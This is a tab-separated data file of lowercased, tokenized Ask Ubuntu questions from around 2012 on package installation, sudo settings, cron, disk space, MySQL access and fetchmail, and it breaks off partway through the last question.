158996	how do i get the libc development libraries for ubuntu 12.04 ?	i want to install glibc-devel package in ubuntu 12.04 . i am vm ware work station in my project and this package is one of the dependency to build project image . i tried to find information on google about this package but didnt find any staisfactory answer . is this package not supported in ubuntu 12.04 ? if not then what is the alternative package for it . any help on this will be useful .
158998	sd card transfer very slow	i copied some mysql-db stuff to my class 6 sd card . it needed 45 min . for the transfer . same machine with xp it does it in a few minutes , with win7 on another machine transfer is also fine . checked all the forums and sources but found nothing really related . version is 12.04
159003	getting all available packages to install	i need to see all the packages that are available to install via a command so i can use it in another program . i tried dpkg -l but it only gives the installed packages . the output is like this : ii apache2-utils 2.2.22-1ubuntu1 utility programs for webservers it is so similar to synaptic output , so is there a common command like this am i missing ? apt-cache is helpful but not it is not in the above format .
159004	how to create a glib.timeval from timestamp ?	i have a value such as 'timestamp ' below , where the last three digits correspond to milliseconds . timestamp = 1340830988768 i currently have code that looks like the following : import indicate indicator = indicate.indicator ( ) indicator.set_property_time ( `` time '' , int ( timestamp [ : -3 ] ) ) i want to amend it to use : from gi.repository import indicate indicator = indicate.indicator ( ) however , the new version of set_property_time requires the second parameter to be a glib.timeval . how do i create a glib.timeval from my timestamp ? millisecond precision is not important for this application .
159006	how to include extra applications in packages created with quickly ?	the application i 'm developing using quickly would benefit from nautilus extension i 'm planning on writing for the occasion . the question is : how do i tell quickly to include this extension in the final package , and how do i specify the right location to install this extension to ?
159007	how do i run specific sudo commands without a password ?	on one particular machine i often need to run sudo commands every now n then . i am fine with entering password on sudo in most of the cases . however there are three sudo commands i want to run without entering password : sudo reboot sudo shutdown -r now sudo shutdown -p now how can i exclude these commands from password protection to sudo ?
159008	how to add startup applications in lubuntu ?	is there a 'startup applications ' app for lubuntu ? or how do i add apps to startup ? i attempted a tutorial to add entries to ~/.config/autostart , but it did not work . is n't there an easy way ? any ideas please ?
159014	how to launch terminal without using dash ?	i just ran the newest ubuntu from an usb stick . now dash is empty and knows nothing about the contents of the computer . i found a fix here but to make it work i should be able to open terminal . how do i do it without dash ? : )
159021	remove a custom dialog windows ( pygtk + quickly )	do quickly have a remove dialog command ? like : quickly remove dialog < dialog-name >
159025	how can i force 10.04 to automatically log me in ( non-gui soltion ideally ) ?	i am trying to get my installation of 10.04 to automatically log me in at start up . i tried to apply this method http : //www.linuxjournal.com/article/3121 but after creating the script there , i was unable to edit the /etc/inittab file as there is not one present . apparently this is because ubuntu does not use this method and instead uses 'upstart ' . is there a similar way to auto login with ubuntu ? ?
159026	why did the installer need a second analog display ?	was rebuffed in more than a few tries at installing a fresh copy of 12.04 alongside my already installed win7 system . the hard drive spun up at first but seems stuck at two small figures at the bottom center of my digital monitor . after serveral tries i swiveled my chair in puzzlement and stared at my second monitor . it 's been disabled in the settings as i rarely use it , but it 's hooked up to the tower . it 's an analog monitor by the way . i flipped it on idly wondering why i even bothered and lo , linux was installing after all ! after install completed i was able to view both systems on my preferred digital monitor , and i turned the old analog model off again ! to the very best of my recollection , i never had this happen upon my initial install , which at the time was done with 11.10 ubuntu . is there an explanation why this happened ?
159028	disk space on home partition shrinks from 5.5gb to 0 after each restart	my disk space `` vanishes '' after in a couple minutes after strating my system . i have a 11 gb home partition and actually only appr . 5 gb are used according to du . df though shows 0 bytes free ? my system can not save any file in the home directory thus it becomes unuseable . any solution approaches ? thanks
159029	how to hide mounted partitions and devices from unity launcher via command line ?	i 've checked and read similar questions , but most of the answers requires installing either dconf-tools , ccsm or myunity . in ubuntu 12.04 , is there a way to hide mounted partitions or devices from the unity launcher without the need to install the aforementioned tools ? is this possible via terminal or command line ?
159030	administration access challenge	using 11.10 and having difficulty locating and accessing administration . objective is to cancel using a password for ubuntu . many thanks for your help . jack
159034	heavy hd activity on memory issue	i have turned off swapping on my ubuntu setup - it was causing heavy i/o and slowing things down . i 'm okay working without the swap and using only the 4gb of ram i have ( computer does n't support more than that ) . my problem is that when the system runs out of memory , it finds the biggest memory hog ( the browser - chrome or firefox ) and asks it to kill a child . the process of doing this takes 20-30 minutes during which the computer is unusable and the hd is working like crazy . is there a way to still allow this to happen but for the child killing to take only a few seconds with no hd activity ? what is causing the hd activity ? bonnie++ results on the hd : version 1.96 -- -- -- sequential output -- -- -- -- sequential input- -- random- concurrency 1 -per chr- -- block -- -rewrite- -per chr- -- block -- -- seeks -- machine size k/sec % cp k/sec % cp k/sec % cp k/sec % cp k/sec % cp /sec % cp somenam-satel 7344m 158 95 58280 24 21731 10 891 96 40872 12 137.0 7 latency 118ms 1479ms 4195ms 23834us 1314ms 1219ms version 1.96 -- -- -- sequential create -- -- -- -- -- -- -- random create -- -- -- -- somenam-satellite-l -create -- -- read -- - -delete -- -create -- -- read -- - -delete -- files /sec % cp /sec % cp /sec % cp /sec % cp /sec % cp /sec % cp 16 9326 43 +++++ +++ 15957 55 14409 60 +++++ +++ 16212 58 latency 12778us 2074us 10070us 607us 98us 1096us 1.96,1.96 , somenam-satellite- l500,1,1341321752,7344m , ,158,95,58280,24,21731,10,891,96,40872,12,137.0,7,16 , , , ,,9326,43 , +++++ , +++,15957,55,14409,60 , +++++ , +++,16212,58,118ms,1479ms,4195ms,23834us,1314ms,1219ms , 12778us,2074us,10070us,607us,98us,1096us
159039	why is the error , dd : /dev/rdisk1bs=1m : operation not supported , popping up while trying to instal ubuntu on usb ?	i am trying to install ubuntu onto my flash drive using the instructions from the website , http : //www.ubuntu.com/download/help/create-a-usb-stick-on-mac-osx , and after step 8 , the terminal asks for my password , which it accepts and then pops u this error message , dd : /dev/rdisk1bs=1m : operation not supported . i have also tried making the last m in that statement capital and then the system does not ask me for my password but the error message still pops up . what is happening and why ?
159040	is there anyway to recover close without saving file ?	after lines of lines i -wrongly- closed the file without saving.is there any way to rescue that lines ( because of close without saving , it is not a file yet . ) edit : i used text editor and it was a text file.i opened the new file to write .
159043	how do i programatically edit label widget in the runtime	how do i programatically edit label widget in the runtime , i am using quickly i tried self.title=builder.get_object ( `` title '' ) for initialising and def update_label ( self , url ) : self.title.set_text ( newlabel ) for updating the label , but it wo n't work ! .honestly i dont know what i am doing . i am an absolute beginner in python
159044	sip clients not working on ubuntu 12.04	i am trying to find a sip client that works on ubuntu 12.04 . i have an account on voipdiscount ( www.voipdiscount.com ) and 12voip ( www.12voip.com ) earlier on ubuntu 11.10 , i was able to use sip clients : twinkle , sfl phone . using these clients , i was able to access my account and make the phone calls to different destinations . but after i installed 12.04 , twinkle , sfl phone and ekiga stopped . whenever i try to make a phone call using one of these software , for some reason they are not able to register . they are failing . any suggestions as to what i can do ? is there any sip client that works on ubuntu 12.04 ? thanks !
159045	is anyone running an amp stack on ubuntu for android ?	i want to get vtigercrm running on an android tablet , what needs to be done to make this possible ? first off is there an apache/mysql/php stack available ? if so what needs to ba done to run a standard install of the vtigercrm software ? all assistance is much appreciated .
159049	download translation from launchpad and compile it to use it in application	i can download translations ( .po and .mo ) from launchpad . i want to use a translation for gwoffice and i do n't want to wait when the translation will be released via the official way . how can i compile a translation into the current installation of the app ?
159052	i do not have `` other user '' login option after upgrading to 12.04	i have upgraded my ubuntu 11.10 to 12.04 . i could not see `` other '' login option in the login screen . it shows only `` guest login '' and `` user login . the user login ask only password and i had never entered in as user login so that i do not know about password of user login . my question is how to login as root from the login screen ? how can i get `` other login '' option to login as root or some other user ? before asking this question i have tried the following : try to add the greeter-show-manual-login=true line at the bottom of /etc/lightdm/lightdm.conf file as guest login but i get access denied error . i do not know the password of user login ( ask only password while login ) to purpose of adding above line . from the safe mode login , i could login as root but i could not add the above line the lightdm.conf file . i got read only error so that i tried to change the permission to 777 like the following chmod 777 lightdm.conf ( while i am in the /etc/lightdm/ dir ) . but i got the error the file marked as/is read only in the file system . in 11.10 version i have created 4 users . i can see that the users exist in 12.10 . so i am sure that the user accounts are not removed in upgrade process . in short , i need other login option on my login screen ? how to get it ? edited question : i have add the following line the /etc/lightdm/lighdm.conf file on recovery mode greeter-show-manual-login=true and i saved the file using wq command . now my /etc/lightdm/lighdm.conf file looking as the following : [ seatdefaults ] greeter-session=unity-greeter user-session=ubuntu greeter-show-manual-login=true if i commit any mistake please correct me . for this problem i have wasted the two working day and all the works are in pending .
159053	mysql server not accessible from remote machine	i have installed mysql server in my local ubuntu server ( 11.10 ) . i ca n't connect to the server from a remote machine . when i tried : - nmap localhost , it shows the following port state service 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 631/tcp open ipp 3306/tcp open mysql it means that 3306 , the mysql port is open , right ? but when i tried nmap 192.168.0.50 , which is the server ip , i get the following : - port state service 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds does this mean the port is not open when accessing using ip ? if so , how do i open the port ? i had tried the following code , but looks like it did n't work . sudo iptables -a input -p tcp -- dport 3306 -j accept what is wrong here ?
159058	how can i run a desktop in the cloud that i can remotely connect to ?	maybe a stupid question but is there any way to set up a cloud ubuntu pc somewhere where i can install everything as usual and access it on several pc and os ? for instance i want to continue my programming work with quickly+glade on a windows xp pc at another place . i know there is virtualbox but i do n't want take care of files synchronization and vm is running very slow at my windows pc . thanks for any suggestions !
159062	wine giving a black screen on precise pangolin	i 'm running precise pangolin with gnome 3.4 . whenever i run a wine application there is a chance that the application will show a black screen and a chance that it might run properly . i have n't found a way to exit the black screen besides rebooting the entire system . ubuntu seems to be still running properly in the background but i ca n't access the terminal or anything else . if rhythmbox is open the music keeps playing . i did n't have this problem with the same wine applications on opensuse 12 or oneiric ocelot but back then i was running gnome 3.2 . the applications run smoothly on windows 7 . it 's really annoying to reboot the system every time wine displays a black screen so is i 'm wondering , is there a workaround for this ?
159063	how can i fix unreliable unity startup ?	when i log in , either unity loads perfectly or it just does n't ; all i see is my desktop background . commands do n't seem to work and i ca n't switch to the terminal view . no matter how long i wait , unity does n't start . i never had this issue with oneiric ocelot . other guis such as gnome 3.4 donât seem to be having that issue . i 've got myubuntu , ubuntu tweaks , compizconf and other tweaking tools installed . could they be causing the problem ? if not , what should i do ? i 'd really like to use unity again . thanks in advance !
159064	switch between speaker , bluetooth stereo , bluetooth mono	using a bluetooth headset that does stereo ( out only ) , mono ( in / out ) and speakers . switching between the 3 is a lot of clicks . what i want to do : - run stereo either on speaker or headset - when i make or accept a voip call ( skype , gtalk etc ) : switch to thr bluetooth profile with input enabled - switch back after the call .or . have a simple menu ( indicator ? ) that allows me to switch between preset combinations of in/out how do i do that ?
159066	convert existing internal hard disk into network attached storage	how can i setup an internal 3.5 '' sata hard disk , with existing data on an ext4 partition , so that i am able to access the data on wlan ? what product should i be looking for to turn the bare drive into some sort of nas ? background : my desktop machine has recently given up the ghost , i think the motherboard has finally died after many years of faithful service . i am not in a position to buy new ram / cpu / motherboard and the old one is probably too old to replace ( i was running a core 2 duo on gigabyte ep-35 ) . i am thinking i can get by with just my laptop for a few months , but i do need access to the data on the hard drives which were in the desktop machine . it is a pair of wd green 3.5 '' sata drives , one 2tb and one 3tb . i want to avoid having to reformat the drives if at all possible .
159073	how can i update ubuntu if the update servers are blocked ?	i connect to the internet through my college wifi and for some weird reason they have blocked all ubuntu updates , so i can not update ubuntu through the common `` update manager '' way . so i was wondering if there was some other method to update ubuntu , maybe manually download each package and then install them or download a dvd image which already has all the packages . i have ubuntu 11.10 installed currently .
159074	why can python3 not import gi.repository ?	python2 does not suffer the same problem . greg @ greg-precise : ~ $ python3 python 3.2.3 ( default , may 3 2012 , 15:51:42 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > from gi.repository import gtk traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > importerror : no module named gi.repository ( line breaks added for clarity )
159080	eclipse indigo very slow on kubuntu 12.04	hello fellow ubuntu users ! i have a really big problem with my eclipse indigo running on kubuntu 12.04 32bit , dell vostro 3500 , intel ( r ) core ( tm ) i5 cpu m480 @ 2.67 ( as cat /proc/cpuinfo said ) . it has 4gb ram . cat /proc/cpuinfo brings up the following : processor : 0 vendor_id : genuineintel cpu family : 6 model : 37 model name : intel ( r ) core ( tm ) i5 cpu m 480 @ 2.67ghz stepping : 5 microcode : 0x2 cpu mhz : 1197.000 cache size : 3072 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 popcnt lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid bogomips : 5319.85 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 37 model name : intel ( r ) core ( tm ) i5 cpu m 480 @ 2.67ghz stepping : 5 microcode : 0x2 cpu mhz : 1197.000 cache size : 3072 kb physical id : 0 siblings : 4 core id : 2 cpu cores : 2 apicid : 4 initial apicid : 4 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 popcnt lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid bogomips : 5319.88 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 2 vendor_id : genuineintel cpu family : 6 model : 37 model name : intel ( r ) core ( tm ) i5 cpu m 480 @ 2.67ghz stepping : 5 microcode : 0x2 cpu mhz : 1197.000 cache size : 3072 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 popcnt lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid bogomips : 5319.88 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 3 vendor_id : genuineintel cpu family : 6 model : 37 model name : intel ( r ) core ( tm ) i5 cpu m 480 @ 2.67ghz stepping : 5 microcode : 0x2 cpu mhz : 1197.000 cache size : 3072 kb physical id : 0 siblings : 4 core id : 2 cpu cores : 2 apicid : 5 initial apicid : 5 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 11 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx rdtscp lm constant_tsc arch_perfmon pebs bts xtopology nonstop_tsc aperfmperf pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 popcnt lahf_lm ida arat dts tpr_shadow vnmi flexpriority ept vpid bogomips : 5319.88 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : java -version brings the following : java version `` 1.7.0_04 '' java ( tm ) se runtime environment ( build 1.7.0_04-b20 ) java hotspot ( tm ) server vm ( build 23.0-b21 , mixed mode ) it 's the oracle java , not openjdk . i try to develop an android application for googletv and eclipse is this slow , that it ca n't follow my typing ( extreme lagging ! ! ) , but this issue makes it almost impossible ! here is my eclipse.ini file : -startup plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar -- launcher.library plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.100.v20110505 -product org.eclipse.epp.package.java.product -- launcher.defaultaction openfile -showsplash org.eclipse.platform -- launcher.xxmaxpermsize 512m -- launcher.defaultaction openfile -vmargs -dosgi.requiredjavaversion=1.5 -declipse.p2.unsignedpolicy=allow -xms256m -xmx512m -xss4m -xx : permsize=128m -xx : maxpermsize=384m -xx : compilethreshold=5 -xx : maxgcpausemillis=10 -xx : maxheapfreeratio=70 -xx : +cmsincrementalpacing -xx : +unlockexperimentalvmoptions -xx : +useg1gc -xx : +usefastaccessormethods -xx : reservedcodecachesize=64m -dcom.sun.management.jmxremote has anybody faced the same problems ? can anybody help me on this problem ? it 's really urgent as i 'm sitting here at my company and am not able to do anything productive ...
159082	/dev/sda1 100 % mysql to blame ?	i have a an api running that receives raw binaries , processes them , and then stores metadata about the bins in a mysql database . i have been running it for a couple days on a vm . today the api stopped processing the mysql commands . after using the command df-h the results were : root @ mwdb1 : / # df -h filesystem size used avail use % mounted on /dev/sda1 104g 99g 0 100 % / udev 16g 4.0k 16g 1 % /dev tmpfs 6.3g 364k 6.3g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 16g 0 16g 0 % /run/shm /dev/sdb1 5.5t 42g 5.2t 1 % /data sda1 is at 100 %
159083	switch user shortcut in gnome shell ui ?	i can not seem to find a default switch-user shortcut in gnome shell . does such exist ? if not , how can i make the one ? i mean , i know that i should go to keyboard shortcuts tool ( custom shortcuts tab ) , but i do not which shell command to use . which shell command is used to activate switch user ? thanks in advance for your time and help .
159084	will installaling from usb hdd harm files in that disk ?	i downloaded ubuntu installer on my portable hdd , and i have a question . will files be deleted from my portable hdd if i install ubuntu directly from it ( i plant to install it on my pc hdd , not on my portable hdd ) .
159085	web fonts became ugly after installing kde	after installing kde-standard on my ubuntu 12.04 , web fonts ( both firefox and chrome ) turned to ugly both in gnome and kde desktops.how do i get back good looking web fonts .
159086	rotate only one screen	if i have only the internal monitor ( lvds1 ) with an xrandr -o left command . now i want to attach a second monitor , say to hdmi1 . then i 'd like to rotate only the internal monitor , but not the external one . i tried the following ( with no external attached though , since i am mobile currently ) , but that does not do anything : xrandr -- output lvds1 -o left how can i rotate only one monitor ? i do need some command line , since i want to put this into a script .
159087	column `` name '' is too wide when i open a folder with a file with a long name ( and remains wide in other folders i open ) . how can i configure this ?	i am using ubuntu 12.04 , gnome shell . each time i start a session and open a folder with a file with a long name the column of `` name '' of that window is too wide ( covers the whole width of the name of the file ) . and worse : it remains wide as i change to any other folders ( with files of normal lenght ) . i would like to configure this in a reasonable fixed width . how can i do that ? i could not find the answer in this question on askubuntu ( it simply did not work ) nor googling . thanks in advance .
159089	how can i repair the whole system knowing that i have ubuntu 12 lts upgraded from ubuntu 11	i think that ubuntu is not stable at all for a beginner or a normal user . all the time there are errors and problems , bugs need to be fixed and reports sent . now .. when i tried to manipulate the unity interface .. things went wrong .. and i used the reset command as follows : unity -- reset but it never really reset . the terminal showed that the computer is doing something but i left the computer to complete this reset for more than 12 hours and it did n't finish .. and the error messages appeared in the terminal were so many . `` warn : can not fetch the children of ... .. `` and things like that . soon , another strange problem appeared . when i click on shut down .. it just log out ! ! and when i click on shut down from the log in screen .. the screen disappears for a second and it comes again . i had to press the power button from my pc in those situations . the strangest thing is that it does n't happen all the time , bu it happened twice or three times till now . so .. backing to the main question .. if i need to reset or repair the whole system ( ubuntu 12.4 lts ) but i do n't have the installing material because i upgraded from ubuntu 11 to ubuntu 12.4 lts online .. how can i do that ? !
159095	problems , connecting android ics to ubuntu using mtp	i 've followed this tutorial from this blog which very clearly explains how to connect android phone with ics to ubuntu so that one can access phone 's sdcard ( mtp access ) . i passed all the procedure with no errors , i can event attach my mobile to ubuntu via mtpfs -o allow_other ~/android/galaxys2 and disconnect via fusermount -u ~/android/galaxys2 the problem comes when i try to access mounted directory . if i try to do it via nautilus , the system tries to open the folder for a couple of minutes and then , i either see the error , or the folder disappears from nautilus ( it comes back when i disconnect the path ) . i also get a console error : fuse : bad mount point `~/android/galaxys2 ' : transport endpoint is not connected i see many people on the net reporting this error , but no-one offers any solution to it . i use ubuntu 11.10 with gnome shell ( gnome 3 ) and the mobile is samsung galaxy s ii . i am in the fuse list , i did all the steps in the tutorial dozens of times , all in vain .
159101	update errors on xubuntu12.04	i 'm trying to install updates via the update manager , and i got this error : the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f when i run apt-get install -f , i get : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied e : unable to lock administration directory ( /var/lib/dpkg/ ) , are you root ? what is wrong ? how do i fix it ? why does this happen ? edit : this is what i get when i do sudo apt-get install -f [ 1 ] https : //www.dropbox.com/s/tzr0s8278pbe9sm/2012-07-03 % 2019.34.07.jpg [ 2 ] https : //www.dropbox.com/s/xmllkxvpa3weg33/2012-07-03 % 2019.34.52.jpg [ 3 ] https : //www.dropbox.com/s/n799fxp3iv44cd4/2012-07-03 % 2019.35.09.jpg picture are in the correct order . too much info for one picture so had to break it into 3 but all of the information is in there .
159102	where to find gtx560ti driver for ubuntu 12.04 ?	i found in this nvidia link : http : //www.nvidia.com/object/linux-display-amd64-295.59-driver.html it says linux x64 ( amd64/em64t ) display driver version : 295.59 certified supported : nvs 5400m nvs 310 quadro 410 geforce gt 620m geforce gt 640m geforce gt 640m le geforce gt 650m geforce gtx 660m geforce gtx 670m geforce gtx 675m geforce gtx 555 geforce gtx 560 se geforce gt 415 geforce gtx 460 v2 is that driver support for gtx560ti ? if not , where is the proper driver ? ( i do n't want to use the driver in ubuntu settings ) thank you~
159103	how can i add playonlinux programs in the unity dash ?	i wonder if there is any way to add the programs installed in playonlinux to the unity dash .
159104	import openvpn client config in gnomeshell w/ network-manager	i have ubuntu 12.04 and i 've imported openvpn configs into network manager in the past with previous versions of ubuntu and gnome . i have a new openvpn config and would like to import it , but ca n't find the import option . i do currently have other openvpn configs working properly . i 'm fairly confident that the required packages are in place . when i go to network settings provided by clicking on the network icon in gnome shell and clicking `` network settings '' i click all over and ca n't find anything about importing a .ovpn config . $ sudo apt-get install openvpn network-manager-openvpn network-manager-openvpn-gnome reading package lists ... done building dependency tree reading state information ... done openvpn is already the newest version . network-manager-openvpn is already the newest version . network-manager-openvpn-gnome is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i did it manually last time , but that is a lot of guess and check trying to figure out which setting aligns with which config line . please save me the hassle . : - )
159107	my encore n300 wireless usb does n't connect , any workarounds ?	i decided to wipe windows 7 and made a full installation . everything works great but for a encore n300 wireless usb dongle that i use on my desktop . ubuntu seems to recognize it and i can browse the available networks , but i can connect to any of them . i was told that i should download its drivers , and so i did it , but i do n't know how to install them . please , i 'd like to know if my connectivity problem is really a driver issue or some other thing .
159109	cron job running successfully suddenly reports script is not found	what might cause cron to suddenly report a file it is supposed to run is `` not found , '' when the file has n't been touched , and in fact , the entire system has n't been touched since it last ran successfully ? i have a cronjob schedule i define by doing sudo crontab -e. in it , i have dozens of cron jobs that run successfully.. i do not have a path specified , and i use absolute paths to call all my scheduled scripts , setting the path in them as needed . i do not specify a shell in the crontab . all scripts identify the shell as their first line . without me touching the system , a particular job defined in the middle of other jobs will suddenly stop running . to debug this , i added an output redirection to a log file . in that , the output clearly shows the output of the script successfully running time after time for weeks , and then suddenly the following appears : /bin/sh : /home/iupress/bin/sync-email_images : not found /bin/sh : /home/iupress/bin/sync-email_images : not found /bin/sh : /home/iupress/bin/sync-email_images : not found /bin/sh : /home/iupress/bin/sync-email_images : not found /bin/sh : /home/iupress/bin/sync-email_images : not found /bin/sh : /home/iupress/bin/sync-email_images : not found /bin/sh : /home/iupress/bin/sync-email_images : not found /bin/sh : /home/iupress/bin/sync-email_images : not found /bin/sh : /home/iupress/bin/sync-email_images : not found if i do the ls command , copying and pasting that exact path from the error message , it clearly reports the file is still there ( no surprise ) . yet the log continues to report that file is `` not found '' until i take action . i can run the script manually and it runs just fine . if i do sudo crontab -e and save the file , the job runs on the next scheduled time , putting its output in the log , no longer reporting the script is `` not found '' . it seems to me the contents of the script trying to be run are irrelevant since cron does n't even process the file because it is `` not found '' . i have a job scheduled below the one that is encountering this problem that i know is continuing to run , because i have its output mailed to me . so i know cron is running and continues to run at least one other job , even after it suddenly reports this job 's script is `` not found '' . all my lines end with a newline . i had no periods in the crontab until i added the redirection to a log file . i have now added a path specification , but left the absolute paths in the jobs . unfortunately , i have no idea if and when this problem will occur . it will likely be weeks from now . by the way , i am running a script to syncronize the clock , and i see the time is exactly what it should be .
159112	disk space wrongly displayed after installing lvm disk	i installed ubuntu server using lvm partitioning on a 1 tb hard disk . however , after installation , i can only see 10 gig space here is the fidsk output ` # fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00041507 device boot start end blocks id system /dev/sda1 * 1 10 71680 83 linux partition 1 does not end on cylinder boundary . /dev/sda2 10 121602 976689152 8e linux lvm disk /dev/dm-0 : 10.7 gb , 10737418240 bytes 255 heads , 63 sectors/track , 1305 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/dm-0 does n't contain a valid partition table disk /dev/dm-1 : 2147 mb , 2147483648 bytes 255 heads , 63 sectors/track , 261 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/dm-1 does n't contain a valid partition table you have new mail in /var/mail/root and df -h output df -h filesystem size used avail use % mounted on /dev/mapper/system-root 9.9g 6.6g 2.8g 71 % / devtmpfs 1.9g 232k 1.9g 1 % /dev tmpfs 1.9g 4.0k 1.9g 1 % /dev/shm /dev/sda1 68m 22m 43m 34 % /boot tmpfs 6.0g 0 6.0g 0 % /var/spool/asterisk/monitor you have new mail in /var/mail/root ` any way to increase this space without reisntalling ?
159119	how to revert packages at their previous state ?	i 've set all of my `` manually installed '' packages as `` automatic installed '' . now apt-get is saying several packages are not needed , and it suggests to use apt-get autoremove to get rid of them . of course i want to mantain such packages and get rid of the message , so i suppose i need to revert them back to their previous status of manually installed . i ca n't do it one by one , because they 're too many . how could i do ?
159122	why wo n't fetchmail work all of a sudden ?	i ran a chmod 777 * on my home folder . ( i know , i know . i 'll never do it again . ) ever since then , fetchmail seems to be broken . i use it to fetch mail from an exchange 2003 mailbox through davmail and owa . the problem is that fetchmail complains about an `` expunge mismatch '' whenever i get a new message . it deletes the message from the exchange mailbox , yet it never forwards it . there seems to be a problem somwhere along the mail processing , but i have n't been able to pinpoint where . any help would be appreciated . here are the relevant config files . ~/fetchmailrc : set no bouncemail defaults : antispam -1 batchlimit 100 poll localhost with protocol imap and port 1143 user domain\\user password password is root no rewrite mda `` /usr/bin/procmail -f % f -d % t '' ; ~/procmailrc : :0 * ^subject . *ack | expand | sed -e 's/ [ ] * $ //g ' | sed -e 's/^/ / ' > /usr/local/nagios/libexec/mail_acknowledgement ~/.forward : | `` /usr/bin/procmail '' and here is the output when i run fetchmail -f /root/.fetchmailrc -vv : fetchmail : warning : running as root is discouraged . old uid list from localhost : < empty > scratch list of uids : < empty > fetchmail : 6.3.19 querying localhost ( protocol imap ) at tue 03 jul 2012 09:46:36 am edt : poll started trying to connect to 127.0.0.1/1143 ... connected . fetchmail : imap < * ok [ capability imap4rev1 auth=login ] imap4rev1 davmail 3.9.7-1870 server ready fetchmail : imap > a0001 capability fetchmail : imap < * capability imap4rev1 auth=login fetchmail : imap < a0001 ok capability completed fetchmail : protocol identified as imap4 rev 1 fetchmail : gssapi error gss_inquire_cred : unspecified gss failure . minor code may provide more information fetchmail : gssapi error gss_inquire_cred : fetchmail : no suitable gssapi credentials found . skipping gssapi authentication . fetchmail : if you want to use gssapi , you need credentials first , possibly from kinit . fetchmail : imap > a0002 login `` domain\\user '' * fetchmail : imap < a0002 ok authenticated fetchmail : selecting or re-polling default folder fetchmail : imap > a0003 select `` inbox '' fetchmail : imap < * 1 exists fetchmail : imap < * 1 recent fetchmail : imap < * ok [ uidvalidity 1 ] fetchmail : imap < * ok [ uidnext 344 ] fetchmail : imap < * flags ( \answered \deleted \draft \flagged \seen $ forwarded junk ) fetchmail : imap < * ok [ permanentflags ( \answered \deleted \draft \flagged \seen $ forwarded junk ) ] fetchmail : imap < a0003 ok [ read-write ] select completed fetchmail : 1 message waiting after first poll fetchmail : imap > a0004 expunge fetchmail : imap < a0004 ok expunge completed fetchmail : 1 message waiting after expunge fetchmail : imap > a0005 search unseen fetchmail : imap < * search 1 fetchmail : 1 is unseen fetchmail : imap < a0005 ok search completed fetchmail : 1 is first unseen 1 message for domain\user at localhost . fetchmail : imap > a0006 fetch 1 rfc822.size fetchmail : imap < * 1 fetch ( uid 343 rfc822.size 1350 ) fetchmail : imap < a0006 ok fetch completed fetchmail : imap > a0007 fetch 1 rfc822.header fetchmail : imap < * 1 fetch ( uid 343 rfc822.header { 1350 } reading message domain\user @ localhost:1 of 1 ( 1350 header octets ) fetchmail : about to deliver with : /usr/bin/procmail -f 'my.name @ domain.com ' -d 'root' # fetchmail : imap < fetchmail : imap < fetchmail : imap < bonne journ=e9e.. fetchmail : imap < 